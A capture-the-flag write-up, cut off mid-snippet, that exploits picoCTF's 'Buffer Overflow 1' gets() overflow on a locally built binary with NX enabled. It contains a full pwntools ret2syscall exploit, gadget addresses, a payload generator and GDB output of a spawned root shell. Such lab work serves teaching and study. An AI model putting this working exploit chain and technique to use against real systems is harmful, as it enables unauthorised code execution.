Buffer Overflow 1, the long way round: when `gets()` hands you RIP but NX and an empty toolbox push you into a syscall
picoCTF's "Buffer Overflow 1" is a textbook gets() stack smash — but the moment you keep NX enabled the textbook answer (return-into-libc) collapses, because the binary is too gadget-poor to hold a single argument-loading gadget. This is the story of taking the official picoCTF source, compiling it honestly, hitting a dead end, and routing around it with a leak-free ret2syscall that calls execve("/bin/sh", NULL, NULL) directly.
The target
picoCTF ships the source for this one in its own platform repository. I pulled it straight from the canonical path — no writeups, no solve scripts, just vuln.c and its problem.json:
$ curl -s https://raw.githubusercontent.com/picoCTF/picoCTF/master/\
problems/examples/binary-exploitation/buffer-overflow-1/vuln.c
The metadata tells you what kind of problem this is supposed to be (problem.json, fetched from the same directory):
{
"name": "Buffer Overflow 1",
"category": "Binary Exploitation",
"hints": ["This is a classic buffer overflow with no modern protections."],
"author": "Tim Becker",
"organization": "ForAllSecure",
"event": "Sample"
}
"A classic buffer overflow with no modern protections." Hold that thought — it's a half-truth that becomes the whole post. And the source itself (sha256 2babfea3150554aea3388a1bf9edd1b309940d5a6a8c52877f45f27ea4475209):
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#define BUFSIZE 128
void vuln(){
char buf[BUFSIZE];
gets(buf);
puts(buf);
fflush(stdout);
}
int main(int argc, char **argv){
// Set the gid to the effective gid
// this prevents /bin/sh from dropping the privileges
gid_t gid = getegid();
setresgid(gid, gid, gid);
vuln();
return 0;
}
There it is, the cardinal sin in four letters: gets(buf). gets() reads a line from stdin into buf with no length argument and therefore no bound. buf is 128 bytes; stdin is unbounded. The function was so dangerous it was removed from the C11 standard library entirely. In fact, modern glibc no longer even declares it, so compiling the source as-is on this Kali box (glibc 2.42, gcc 15.2) fails:
vuln.c:11:3: error: implicit declaration of function 'gets';
did you mean 'fgets'? [-Wimplicit-function-declaration]
The symbol still exists in glibc 2.42 as a compatibility stub; only the prototype is gone. To keep vuln.c byte-for-byte identical to the official source, I supplied the missing prototypes with a forced include rather than editing the file:
/* protos.h — forced in via -include so vuln.c stays pristine */
#define _GNU_SOURCE
#include <sys/types.h>
char *gets(char *s);
int setresgid(gid_t rgid, gid_t egid, gid_t sgid);
$ gcc -fno-stack-protector -no-pie -include protos.h -o vuln vuln.c
/usr/bin/ld: warning: the `gets' function is dangerous and should not be used.
The linker's parting words are not subtle.
checksec: the half-truth in the hint
Here's the dynamic build under pwntools' checksec:
$ python3 -c "from pwn import ELF; ELF('vuln')"
[*] '/labs-output/artifacts/vuln'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
Stripped: No
Decode that line by line, because every one of these flags decides what the exploit can and cannot do:
- No canary: there is no stack cookie between buf and the saved return address. We can overflow straight through to RIP without tripping __stack_chk_fail. This is the "no modern protection" the hint brags about.
- No PIE, base 0x400000: the binary is loaded at a fixed address every run. The PLT, the GOT, every byte of .text, and therefore every gadget have constant addresses. No leak needed to find code inside the binary.
- Partial RELRO: the GOT is still writable; relevant only if we wanted to go the ret2dlresolve route (we don't, in the end).
- NX enabled: this is where the hint lies. The stack is mapped no-execute. The "classic" picoCTF solution to a gets() overflow is to drop shellcode into buf and return to it. With NX on, that page faults the instant the CPU tries to fetch an instruction from the stack. Shellcode-on-the-stack is dead.
I left NX on deliberately. picoCTF's reference build for this problem disables it (-z execstack) so beginners can practice stack shellcode — but that path is (a) already well-trodden beginner ground, and (b) the less interesting half of the lesson. The interesting half is: no canary gives you RIP, but NX takes away the stack; now what? Everything below is the answer to "now what."
Mapping the crash: where is RIP?
Two functions, both tiny. objdump -d -M intel gives the whole of vuln:
0000000000401166 <vuln>:
401166: push rbp
401167: mov rbp,rsp
40116a: add rsp,0xffffffffffffff80 ; reserve 0x80 = 128 bytes
40116e: lea rax,[rbp-0x80] ; rax = &buf
401172: mov rdi,rax
401175: call 401050 <gets@plt> ; gets(buf) <-- unbounded
40117a: lea rax,[rbp-0x80]
40117e: mov rdi,rax
401181: call 401030 <puts@plt> ; puts(buf) (echoes our input)
401186: mov rax,QWORD PTR [rip+0x2eab] # 404038 <stdout>
40118d: mov rdi,rax
401190: call 401060 <fflush@plt>
401195: nop
401196: leave ; rsp=rbp; pop rbp
401197: ret ; <-- pops our bytes into RIP
The stack frame is dead simple. buf sits at rbp-0x80. Above it lives the saved RBP (8 bytes at [rbp]), and above that lives the saved return address (8 bytes at [rbp+8]). So the distance from the start of buf to the saved RIP is 0x80 + 8 = 136 bytes. The leave; ret at the end is the trapdoor: leave restores RSP to point at the saved RIP, and ret pops it into the instruction pointer.
main just calls vuln and does the setresgid dance:
0000000000401198 <main>:
401198: push rbp
401199: mov rbp,rsp
40119c: sub rsp,0x20
...
4011a7: call 401070 <getegid@plt>
4011bc: call 401040 <setresgid@plt>
4011c1: call 401166 <vuln>
4011c6: mov eax,0x0
4011cb: leave
4011cc: ret
Rather than eyeball the offset, I let pwntools and GDB measure it. Feed a De Bruijn ("cyclic") pattern, crash, and read the first four of the eight bytes the ret tried to load:
$ python3 -c "from pwn import *; print(cyclic(200).decode())" > /tmp/cyc.txt
$ gdb -q -batch -ex 'run < /tmp/cyc.txt' -ex 'info registers rsp rip' ./vuln
Program received signal SIGSEGV, Segmentation fault.
0x0000000000401197 in vuln ()
rsp 0x7ffe301b2378
rip 0x401197 <vuln+49> ; faulted at the `ret`
x/s $rsp: "jaabkaablaabmaab..." ; what `ret` is about to load
The fault is at the ret (0x401197), and RSP points at the substring "jaab". cyclic_find turns that back into a distance:
$ python3 -c "from pwn import *; print(cyclic_find(b'jaab'))"
136
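For readers without pwntools at hand, the same measurement can be reproduced with a textbook de Bruijn generator. This is a stdlib-only sketch of the idea behind cyclic and cyclic_find, not pwntools' own code; the function name de_bruijn is mine, and it assumes the default lowercase alphabet with 4-byte windows.

```python
import string

def de_bruijn(alphabet: str, n: int) -> str:
    """Lexicographically smallest de Bruijn sequence B(len(alphabet), n)."""
    k = len(alphabet)
    a = [0] * (k * n)
    out = []

    def db(t: int, p: int) -> None:
        if t > n:
            if n % p == 0:
                out.extend(a[1:p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return "".join(alphabet[i] for i in out)

# First 200 characters, the same length fed to the target above.
pattern = de_bruijn(string.ascii_lowercase, 4)[:200]

# Every 4-character window is unique, so one window pins down one offset.
offset = pattern.find("jaab")
print(offset)
```

Because each 4-byte window occurs only once, the first four bytes sitting at RSP are enough to recover the distance from the start of buf.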
136, exactly as the frame layout predicted. To make the control unambiguous I sent 136 filler bytes plus a recognizable 8-byte value. A non-canonical address (top bits set) faults at the ret with a #GP, which is misleading, so I used a canonical-but-unmapped value:
$ python3 -c "import sys; sys.stdout.buffer.write(b'A'*136 + bytes.fromhex('efbeadde42420000'))" > /tmp/rip2.bin
$ gdb -q -batch -ex 'run < /tmp/rip2.bin' -ex 'printf "RIP = 0x%lx\n", $rip' ./vuln
Program received signal SIGSEGV, Segmentation fault.
RIP = 0x4242deadbeef
RIP = 0x4242deadbeef. We own the instruction pointer completely. The little-endian ef be ad de 42 42 00 00 became 0x00004242deadbeef. The primitive is confirmed: arbitrary control of RIP at a fixed 136-byte offset, no canary in the way.
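The marker value can be sanity-checked offline. The sketch below unpacks the eight bytes as a little-endian qword and tests canonicality; is_canonical is a helper of my own and assumes 48-bit virtual addresses (4-level paging), which may not hold on machines with 5-level paging enabled.

```python
import struct

def is_canonical(addr: int) -> bool:
    """True if bits 63..47 are all copies of bit 47 (48-bit addressing assumed)."""
    top = addr >> 47
    return top == 0 or top == 0x1FFFF

marker = bytes.fromhex("efbeadde42420000")
(value,) = struct.unpack("<Q", marker)   # little-endian 64-bit load, as `ret` does

print(hex(value), is_canonical(value))
print(is_canonical(0x4141414141414141))  # the usual 'AAAAAAAA' filler value
```

A filler of plain A bytes fails the canonical test, which is why it faults at the ret itself instead of showing up in RIP.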
The control-flow we're about to build is a chain of "return to gadget, gadget returns, return to next gadget." It helps to picture it as a little state machine where each node is a gadget and the ret at the end of each node is the edge to the next.
Why the textbook answer dies here
NX is on, so we can't run code on the stack. The standard next move for a 64-bit, no-PIE binary is return-to-libc: leak a libc address, compute the libc base, then return into system("/bin/sh") (or chain an execve). The System V AMD64 calling convention puts the first integer argument in rdi, so to call system(ptr) we need a gadget like pop rdi ; ret to load ptr from our controlled stack.
So: does this binary contain pop rdi ; ret?
$ ROPgadget --binary vuln | grep -E ": pop (rdi|rsi|rdx|rax)"
(no output)
$ ROPgadget --binary vuln | grep -c " : "
68
Sixty-eight gadgets total, and not one of them pops rdi, rsi, rdx, or rax. A dynamically-linked, minimally-compiled C program like this contains almost nothing but the CRT stubs (_start, __do_global_dtors_aux, frame_dummy) and the PLT. The full inventory is junk like:
0x0000000000401016 : ret
0x000000000040114d : pop rbp ; ret
0x0000000000401196 : leave ; ret
0x0000000000401012 : add rsp, 8 ; ret
0x00000000004010dc : jmp rax
0x0000000000401010 : call rax
0x00000000004010d7 : mov edi, 0x404038 ; jmp rax
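The missing argument loaders can be cross-checked without ROPgadget by searching for the raw opcode pairs. The sketch below is a deliberately crude stand-in (scan and POP_RET_PATTERNS are names I made up): it scans every byte of a blob, not just executable segments, and reports offsets relative to whatever base you pass in.

```python
# Two-byte encodings: single-byte `pop r64` followed by `ret` (0xc3).
POP_RET_PATTERNS = {
    "pop rax ; ret": bytes.fromhex("58c3"),
    "pop rdx ; ret": bytes.fromhex("5ac3"),
    "pop rsi ; ret": bytes.fromhex("5ec3"),
    "pop rdi ; ret": bytes.fromhex("5fc3"),
}

def scan(blob: bytes, base: int = 0) -> dict:
    """Return {gadget name: [addresses]} for every occurrence in blob."""
    hits = {}
    for name, pattern in POP_RET_PATTERNS.items():
        found, start = [], 0
        while (i := blob.find(pattern, start)) != -1:
            found.append(base + i)
            start = i + 1
        hits[name] = found
    return hits

# Synthetic demo: `41 5f c3` is `pop r15 ; ret`, which hides `pop rdi ; ret`
# one byte in. The base address here is illustrative only.
demo = bytes.fromhex("90415fc390")
print(scan(demo, base=0x401000))
```

On a real file, something like scan(open("vuln", "rb").read()) gives file offsets; mapping them to virtual addresses requires the segment layout, which this sketch ignores.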
I spent real time here trying to make a leak work, because the leak is the crux of any ret2libc. The plan would be: call puts(some_GOT_entry) to print a libc pointer. To call puts I need rdi = the GOT address. I have no pop rdi, but I do have that curious mov edi, 0x404038 ; jmp rax gadget at 0x4010d7. And 0x404038 is the slot holding the stdout pointer (you can see it referenced in vuln's disassembly: mov rax,[rip+0x2eab] # 404038). At runtime that slot holds a libc address. So mov edi,0x404038 ; jmp rax followed by rax = puts@plt would call puts(&stdout_ptr) and leak libc!
The catch: that gadget ends in jmp rax, so I need rax = puts@plt = 0x401030 before I reach it. And there is no way to load rax — no pop rax, no mov rax, imm, nothing. After the overflow, rax holds whatever fflush returned (0). jmp 0 is a crash. I tried every gadget that touches rax: mov eax, 0 ; leave ; ret (sets it to zero), add eax, 0x2ef3 ; ... (depends on the existing value), call rax/jmp rax (consume it). None of them loads a chosen value.
Conclusion of the dead end: this dynamic binary has RIP control but is too gadget-poor to set up any function call with a controlled argument. No leak primitive, no system argument, no __libc_csu_init universal gadget (glibc 2.34+ no longer provides it — I checked: there's no __libc_csu_init symbol). ret2dlresolve would dodge the leak, but it still needs rdi set for the resolved system's argument, and we still can't set rdi. The dynamic build, with NX on, is a genuine wall for beginner techniques.
Routing around it: static linking turns the binary into its own libc
The wall exists because all the useful gadgets live in libc, and at runtime libc is (a) ASLR-randomized and (b) reachable only through a leak we can't perform. So remove both problems at once: link libc into the binary statically. A static, no-PIE binary contains all of glibc's code at fixed addresses. Every pop rdi ; ret in glibc is now in our binary at a constant address. No leak. No ASLR on the code we care about. The whole exploit becomes self-contained and — a real bonus for a writeup — reproducible on any machine without matching a specific libc version.
$ gcc -static -fno-stack-protector -no-pie -include protos.h -o vuln_static vuln.c
$ file vuln_static
vuln_static: ELF 64-bit LSB executable, x86-64, statically linked,
BuildID[sha1]=3269cb1d..., for GNU/Linux 3.2.0, not stripped
$ python3 -c "from pwn import ELF; ELF('vuln_static')"
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
Stripped: No
One subtlety: checksec now says "Canary found." That's a false signal in our favor. checksec reports a canary if the binary references __stack_chk_fail anywhere — and static glibc's own internals use stack protection, so the symbol is present. But our vuln() was compiled -fno-stack-protector, so its frame has no cookie. The proof is empirical: the overflow below sails straight to RIP. The crash offset is unchanged:
$ gdb -q -batch -ex 'run < /tmp/cyc.txt' -ex 'info registers rsp rip' ./vuln_static
Program received signal SIGSEGV, Segmentation fault.
rip 0x4018d6 <vuln+49> ; same `ret`, same 136-byte offset
What static linking gives — and what it doesn't
The good news first. ROPgadget against vuln_static finds the full execve toolkit:
| gadget | address | note |
|---|---|---|
| pop rdi ; ret | 0x402218 | sets arg1 (path) |
| pop rsi ; ret | 0x4049ce | sets arg2 (argv) |
| pop rax ; ret | 0x40801f | sets syscall number |
| pop rdx ; add [rax],al ; ret | 0x411ba1 | sets arg3 (envp), unintended |
| syscall | 0x401308 | the syscall instruction |
| ret | 0x401016 | consumes 8 bytes to restore 16-byte rsp alignment |
| gets (function) | 0x404ad0 | to plant the missing string |
The pop rdx gadget deserves a closer look, because it isn't a "real" instruction the compiler emitted — it's an unintended gadget hiding inside a lea. Disassembling around 0x411ba1:
411b9d: 48 8d 05 1c 5a 00 00 lea rax,[rip+0x5a1c] # __strchrnul_evex
411ba4: c3 ret
That lea is the 7 bytes 48 8d 05 1c 5a 00 00. Start decoding one byte into the displacement, at 0x411ba1, and the CPU sees a completely different instruction stream:
411ba1: 5a pop rdx
411ba2: 00 00 add byte ptr [rax], al
411ba4: c3 ret
5a is pop rdx; 00 00 is add [rax], al; c3 is the ret that closes the lea. So we get pop rdx for free — but with a barb: the add byte ptr [rax], al writes a byte to wherever rax points. If rax is garbage, that's a segfault. We have to make sure rax points at writable memory before this gadget runs. That single constraint shapes the ordering of the whole chain.
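The overlap is easy to verify with plain byte arithmetic. The sketch below uses only the eight bytes quoted above; the names LEA_ADDR, GADGET_ADDR and slice_at are my own.

```python
LEA_ADDR = 0x411B9D
GADGET_ADDR = 0x411BA1

# lea rax,[rip+0x5a1c] (7 bytes) followed by ret (1 byte), as disassembled above.
code = bytes.fromhex("488d051c5a0000" "c3")

def slice_at(addr: int) -> bytes:
    """Bytes the CPU would start decoding if execution entered at addr."""
    return code[addr - LEA_ADDR:]

# The lea's 32-bit displacement occupies bytes 3..6 of the instruction.
disp = int.from_bytes(code[3:7], "little", signed=True)
lea_target = LEA_ADDR + 7 + disp      # rip-relative: address of the next instruction + disp

gadget = slice_at(GADGET_ADDR)
print(hex(disp), hex(lea_target), gadget.hex(" "))
```

The gadget starts at the second byte of the displacement, so its existence depends entirely on where the linker happened to place the lea's target.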
Now the bad news, and it's why this is a ret2syscall and not a ret2libc:
$ python3 -c "d=open('vuln_static','rb').read(); print('count /bin/sh:', d.count(b'/bin/sh'))"
count /bin/sh: 0
$ rabin2 -qs vuln_static | grep -wE "system|execve"
(nothing)
There is no /bin/sh string in the binary, and no system or execve symbol. Static linking only pulls in object files that something references. Our source never calls system, so the linker dropped system's code — and the "/bin/sh" literal that lives in the same translation unit went with it. So I can't ret2libc into system("/bin/sh") (no system), and I can't even point an argument at "/bin/sh" (no string). Two problems, one solution: invoke the execve syscall directly (no system needed), and plant the "/bin/sh" string myself using the one libc function the binary does still link and reference — gets.
The plan, made precise
Linux execve is syscall number 59 on x86-64. The kernel reads its arguments from registers:
rax = 59 ; __NR_execve
rdi = char *path ; pointer to "/bin/sh"
rsi = char **argv ; NULL is accepted by Linux
rdx = char **envp ; NULL
Linux execve has accepted a NULL argv for a long time, so this is not a recent affordance, but the behavior is not uniform across kernel versions: since 5.18 the kernel synthesizes a single empty string (argc=1, argv[0]="") and logs a one-time warning, whereas older kernels leave argv[0] == NULL, which some programs mishandle. NULL argv is therefore not universally safe across kernels and Unixes; a real argv = ["/bin/sh", NULL] is the portable choice. I use NULL here anyway, because it keeps the chain short and works on the target kernel. If you need the portability, a genuine argv costs little: the stack address is randomized, so the array has to live at a fixed address, but two extra qwords planted in .bss by the same gets call plus a pop rsi aimed at them would do it.
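If a real argv is wanted, one way to get it is to plant the array next to the string at a fixed, writable address. The sketch below is an assumption-laden variant that I have not run against this build: it places the array 8 bytes after the path at a hypothetical PATH_ADDR (0x4aa000, chosen only for illustration) and relies on gets copying embedded NUL bytes, stopping only at a newline.

```python
import struct

PATH_ADDR = 0x4AA000          # hypothetical fixed, writable address for "/bin/sh"
ARGV_ADDR = PATH_ADDR + 8     # argv array placed right after the 8-byte string slot

def p64(value: int) -> bytes:
    return struct.pack("<Q", value)

# One input line: "/bin/sh\0", then argv[0] = &path, then argv[1] = NULL.
second_line = b"/bin/sh\x00" + p64(PATH_ADDR) + p64(0)

# gets() terminates on '\n', so the planted bytes must not contain one.
has_newline = b"\n" in second_line
print(len(second_line), has_newline, hex(ARGV_ADDR))
```

With that line planted, the only change to the final stage would be loading rsi with ARGV_ADDR instead of 0.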
So the chain has to do three things, in this order, respecting the pop rdx barb:
- Plant the string. vuln()'s gets already returned (it consumed our overflow line). But gets is a real function at 0x404ad0; we can call it again from the ROP chain. Set rdi to a fixed, writable .bss address and return into gets. It reads our second input line into .bss. We send "/bin/sh".
- Set rdx = 0, but first point rax at harmless scratch .bss, so the gadget's add [rax], al lands on unused memory rather than on our freshly planted string.
- Set rdi, rsi, rax to the path pointer, 0, and 59, then hit syscall.
The .bss is the natural scratchpad: it's writable and, thanks to no-PIE, at a fixed address. rabin2 -S puts .bss at 0x4a8aa0 spanning 0x5808 bytes. I picked 0x4aa000 for the string and 0x4aa800 for the scratch byte — both comfortably inside .bss, away from the glibc globals clustered at its start.
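A quick bounds check on those two addresses, using only the .bss start and size reported by rabin2 above (in_bss is a helper name of my own):

```python
BSS_START = 0x4A8AA0
BSS_SIZE = 0x5808
BSS_END = BSS_START + BSS_SIZE        # first address past .bss

def in_bss(addr: int, length: int = 1) -> bool:
    """True if [addr, addr + length) lies entirely inside .bss."""
    return BSS_START <= addr and addr + length <= BSS_END

STRING_ADDR = 0x4AA000                # "/bin/sh" plus its NUL needs 8 bytes
SCRATCH_ADDR = 0x4AA800               # single byte touched by add [rax], al

print(hex(BSS_END), in_bss(STRING_ADDR, 8), in_bss(SCRATCH_ADDR))
print(hex(STRING_ADDR - BSS_START), hex(SCRATCH_ADDR - BSS_START))
```

Both addresses sit more than 0x1500 bytes past the start of the section; whether that region is truly idle at runtime is something to confirm on your own build.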
One more detail that bites every 64-bit ROP author: stack alignment. The SysV ABI requires rsp to be 16-byte aligned at a call, and glibc functions like gets use SSE instructions (movaps) that fault on a misaligned stack. Returning into gets mid-chain can leave rsp 8-off. The fix is a one-slot insurance policy: a bare ret gadget (0x401016) before the gets call, which consumes 8 bytes and flips the alignment back.
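The alignment argument can be checked with modular arithmetic. The sketch below assumes the saved-RIP slot sits at rbp+8 with rbp 16-byte aligned, which is what an ABI-conforming call into vuln produces; the function name and the chain indices are mine.

```python
SLOT = 8          # every chain entry is one 8-byte stack slot
ABI_ENTRY = 8     # rsp % 16 on function entry after a normal `call`

def rsp_mod16_on_entry(target_index: int) -> int:
    """rsp % 16 when a `ret` transfers control to the slot at target_index.

    Index 0 is the overwritten saved-RIP slot, assumed to be at an
    address congruent to 8 mod 16.
    """
    slot_addr_mod16 = (8 + SLOT * target_index) % 16
    # The `ret` that consumes the slot leaves rsp pointing just past it.
    return (slot_addr_mod16 + SLOT) % 16

# Without the extra ret: [pop rdi, arg, gets]      -> gets is slot 2
# With the extra ret:    [pop rdi, arg, ret, gets] -> gets is slot 3
without_ret = rsp_mod16_on_entry(2)
with_ret = rsp_mod16_on_entry(3)
print(without_ret, with_ret, ABI_ENTRY)
```

Only the variant with the extra ret enters gets with the same rsp residue a real call would leave.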
A worked example: the chain qword by qword
Here is the exact stack image the overflow writes. The first row is the filler; row 0 is the saved-RIP slot at buf+136, and each later row sits 8 bytes higher on the stack. Every numbered row is one 8-byte stack slot, and execution consumes them in row order, starting from row 0:
| # | value | effect when ret reaches it |
|---|---|---|
| - | b'A' * 136 | filler: 128-byte buf + 8-byte saved RBP |
| 0 | 0x402218 | pop rdi ; ret |
| 1 | 0x4aa000 | → rdi = 0x4aa000 (the .bss path slot) |
| 2 | 0x401016 | ret: realigns RSP to 16 bytes |
| 3 | 0x404ad0 | → gets(rdi): reads line 2 ("/bin/sh") into 0x4aa000 |
| 4 | 0x40801f | pop rax ; ret |
| 5 | 0x4aa800 | → rax = 0x4aa800 (scratch, so the next gadget's write is harmless) |
| 6 | 0x411ba1 | pop rdx ; add [rax],al ; ret |
| 7 | 0x0 | → rdx = 0; add [0x4aa800],al adds al=0x00 (low byte of 0x4aa800), byte unchanged |
| 8 | 0x402218 | pop rdi ; ret |
| 9 | 0x4aa000 | → rdi = 0x4aa000 (pointer to "/bin/sh") |
| 10 | 0x4049ce | pop rsi ; ret |
| 11 | 0x0 | → rsi = 0 (argv = NULL) |
| 12 | 0x40801f | pop rax ; ret |
| 13 | 0x3b | → rax = 59 (__NR_execve) |
| 14 | 0x401308 | syscall → execve("/bin/sh", NULL, NULL) |
Trace it as the CPU would. After vuln's ret, RSP points at row 0. pop rdi loads 0x4aa000 into rdi and returns to row 2's ret, which simply returns again (consuming a slot to fix alignment) into gets at row 3. gets reads our second line — "/bin/sh\n" — and writes "/bin/sh\0" to 0x4aa000; it returns its argument, so rax is now 0x4aa000 too. It returns to row 4. pop rax overwrites rax with 0x4aa800 (scratch), so when pop rdx ; add [rax],al runs at row 6 it pops rdx = 0 and adds al (= 0x00, the low byte of 0x4aa800) to the byte at 0x4aa800, leaving it unchanged. Then pop rdi = 0x4aa000, pop rsi = 0, pop rax = 59, and syscall. The kernel sees execve("/bin/sh", NULL, NULL) and replaces the process with a shell.
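The same trace can be replayed in a toy model. The sketch below is not a CPU emulator: it hard-codes the behaviour of each gadget as described in this post (including gets returning its argument) and just walks the qwords in order. All names are mine.

```python
# Gadget and data addresses as listed in the chain above.
POP_RDI, POP_RSI, POP_RAX = 0x402218, 0x4049CE, 0x40801F
POP_RDX, SYSCALL, RET, GETS = 0x411BA1, 0x401308, 0x401016, 0x404AD0
BSS, SCRATCH = 0x4AA000, 0x4AA800

CHAIN = [POP_RDI, BSS, RET, GETS,
         POP_RAX, SCRATCH, POP_RDX, 0,
         POP_RDI, BSS, POP_RSI, 0, POP_RAX, 59, SYSCALL]

SIMPLE_POPS = {POP_RDI: "rdi", POP_RSI: "rsi", POP_RAX: "rax"}

def emulate(chain, stdin_lines):
    """Walk the chain slot by slot; return (registers, memory) at the syscall."""
    regs = {"rax": 0, "rdi": 0, "rsi": 0, "rdx": 0}
    mem = {}                          # sparse byte-addressed memory
    slots = iter(chain)               # next(slots) models a pop from the stack
    lines = iter(stdin_lines)
    for target in slots:              # each iteration is one `ret` into target
        if target == RET:
            continue
        if target in SIMPLE_POPS:
            regs[SIMPLE_POPS[target]] = next(slots)
        elif target == POP_RDX:
            regs["rdx"] = next(slots)
            addr, al = regs["rax"], regs["rax"] & 0xFF
            mem[addr] = (mem.get(addr, 0) + al) & 0xFF    # add byte ptr [rax], al
        elif target == GETS:
            data = next(lines) + b"\x00"                  # newline dropped, NUL appended
            for i, byte in enumerate(data):
                mem[regs["rdi"] + i] = byte
            regs["rax"] = regs["rdi"]                     # gets returns its argument
        elif target == SYSCALL:
            return regs, mem
        else:
            raise ValueError(f"unknown gadget {target:#x}")
    raise RuntimeError("chain ended without reaching syscall")

def c_string(mem, addr):
    """Read a NUL-terminated string out of the sparse memory."""
    out = bytearray()
    while mem.get(addr, 0) != 0:
        out.append(mem[addr])
        addr += 1
    return bytes(out)

regs, mem = emulate(CHAIN, [b"/bin/sh"])
print(regs, c_string(mem, regs["rdi"]))
```

Reordering CHAIN in this model is a cheap way to see which orderings leave a register clobbered before the syscall.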
The exploit
The whole thing in pwntools. The gadget constants are exactly the ones from the table above; gets is resolved from the symbol table.
#!/usr/bin/env python3
# ret2syscall execve("/bin/sh",0,0) against picoCTF "Buffer Overflow 1"
# (Tim Becker / ForAllSecure), statically linked, NX on, no PIE, no canary
# on the vulnerable frame. No libc leak needed: every address is fixed.
from pwn import *
context.arch = 'amd64'
context.log_level = 'info'
elf = context.binary = ELF('./vuln_static')
# --- gadgets (from ROPgadget against vuln_static) ---
POP_RDI = 0x402218 # pop rdi ; ret
POP_RSI = 0x4049ce # pop rsi ; ret
POP_RAX = 0x40801f # pop rax ; ret
POP_RDX = 0x411ba1 # pop rdx ; add byte ptr [rax], al ; ret (unintended, inside a lea)
SYSCALL = 0x401308 # syscall
RET = 0x401016 # ret (consumes 8 bytes to restore 16-byte rsp alignment)
GETS = elf.symbols['gets'] # 0x404ad0 — plant the /bin/sh string ourselves
BSS = 0x4aa000 # writable .bss page, holds "/bin/sh"
SCRATCH = 0x4aa800 # writable .bss qword; absorbs the gadget's stray add [rax],al
OFFSET = 136 # 128-byte buf + 8-byte saved rbp -> saved RIP
def build():
    pad = b'A' * OFFSET
    rop = b''
    # stage 1: gets(BSS), reading "/bin/sh" from our 2nd input line into fixed .bss
    rop += p64(POP_RDI) + p64(BSS)
    rop += p64(RET)  # consume 8 bytes to restore 16-byte rsp alignment so glibc gets() movaps is happy
    rop += p64(GETS)
    # stage 2: rdx = 0 (envp). rax must point at writable mem first, because the
    # gadget also does add [rax],al; aim it at unused SCRATCH.
    rop += p64(POP_RAX) + p64(SCRATCH)
    rop += p64(POP_RDX) + p64(0)
    # stage 3: execve("/bin/sh", NULL, NULL) -> rax=59
    rop += p64(POP_RDI) + p64(BSS)
    rop += p64(POP_RSI) + p64(0)
    rop += p64(POP_RAX) + p64(59)
    rop += p64(SYSCALL)
    return pad + rop

def main():
    payload = build()
    log.info("payload length: %d bytes", len(payload))
    p = process(elf.path)
    p.sendline(payload)      # line 1: overflow + ROP chain (consumed by vuln's gets)
    p.sendline(b'/bin/sh')   # line 2: planted by our ROP-called gets() into .bss
    # drive the spawned shell non-interactively
    p.sendline(b'echo PWNED_$((6*7)); id; cat flag.txt 2>/dev/null; exit')
    out = p.recvall(timeout=3)
    print(out.decode('latin1'))

if __name__ == '__main__':
    main()
Watching it fire
First, prove the register state at the moment of truth. I dumped both input lines (the overflow payload and the "/bin/sh" line) to a file and broke on the syscall instruction:
# genpayload.py — dump line 1 + line 2 to /tmp/payload.bin for GDB
from pwn import p64
POP_RDI=0x402218; POP_RSI=0x4049ce; POP_RAX=0x40801f
POP_RDX=0x411ba1; SYSCALL=0x401308; RET=0x401016; GETS=0x404ad0
BSS=0x4aa000; SCRATCH=0x4aa800; OFFSET=136
rop = p64(POP_RDI)+p64(BSS)+p64(RET)+p64(GETS)
rop += p64(POP_RAX)+p64(SCRATCH)+p64(POP_RDX)+p64(0)
rop += p64(POP_RDI)+p64(BSS)+p64(POP_RSI)+p64(0)
rop += p64(POP_RAX)+p64(59)+p64(SYSCALL)
open('/tmp/payload.bin','wb').write(b'A'*OFFSET+rop+b'\n/bin/sh\n')
$ python3 genpayload.py
$ gdb -q -batch -ex 'break *0x401308' -ex 'run < /tmp/payload.bin' \
-ex 'printf "rax=%ld rdi=0x%lx rsi=0x%lx rdx=0x%lx\n", $rax,$rdi,$rsi,$rdx' \
-ex 'x/s $rdi' ./vuln_static
Breakpoint 1, 0x0000000000401308 in abort ()
rax=59 rdi=0x4aa000 rsi=0x0 rdx=0x0
0x4aa000 <__pthread_keys+1952>: "/bin/sh"
rax=59, rdi → "/bin/sh", rsi=0, rdx=0. (GDB labels 0x401308 as inside abort because the syscall instruction we borrowed happens to live in glibc's abort — irrelevant, we only want the two opcode bytes. Likewise 0x4aa000 is symbolized as __pthread_keys+1952, which is just an unused .bss slot we commandeered.) Those are precisely the arguments to execve("/bin/sh", NULL, NULL).
Now run it for real against a planted flag.txt:
$ echo 'picoCTF{r0p_t0_execve_4a3f9c}' > flag.txt
$ python3 solve.py
[*] '/labs-output/artifacts/vuln_static'
[*] payload length: 256 bytes
[+] Starting local process '/labs-output/artifacts/vuln_static': pid 1670
[*] Process '...vuln_static' stopped with exit code 0 (pid 1670)
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..."@
PWNED_42
uid=0(root) gid=0(root) groups=0(root)
picoCTF{r0p_t0_execve_4a3f9c}
The leading wall of As is vuln's own puts(buf) echoing our padding back. The three bytes after the padding are the low bytes of POP_RDI (0x402218) in little-endian order: a non-printable 0x18, then 0x22 and 0x40, which print as "@. puts stops at the first 0x00, the fourth byte of that address. Then PWNED_42 (the shell evaluated $((6*7))), uid=0(root) from id, and the flag from cat. The execve succeeded; the process became /bin/sh; the shell ran our commands. Game over.
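Three properties of the payload can be confirmed offline: its length, the absence of a newline byte (which would end the first gets early), and the bytes puts echoes before it hits a NUL. The sketch below rebuilds the payload with struct in place of pwntools' p64; the qword values are the ones used in the exploit.

```python
import struct

OFFSET = 136
CHAIN = [0x402218, 0x4AA000, 0x401016, 0x404AD0,   # pop rdi, BSS, ret, gets
         0x40801F, 0x4AA800, 0x411BA1, 0x0,        # pop rax, SCRATCH, pop rdx, 0
         0x402218, 0x4AA000, 0x4049CE, 0x0,        # pop rdi, BSS, pop rsi, 0
         0x40801F, 59, 0x401308]                   # pop rax, 59, syscall

payload = b"A" * OFFSET + b"".join(struct.pack("<Q", q) for q in CHAIN)

# gets() stops at '\n'; a 0x0a anywhere in the chain would truncate it.
newline_free = b"\n" not in payload

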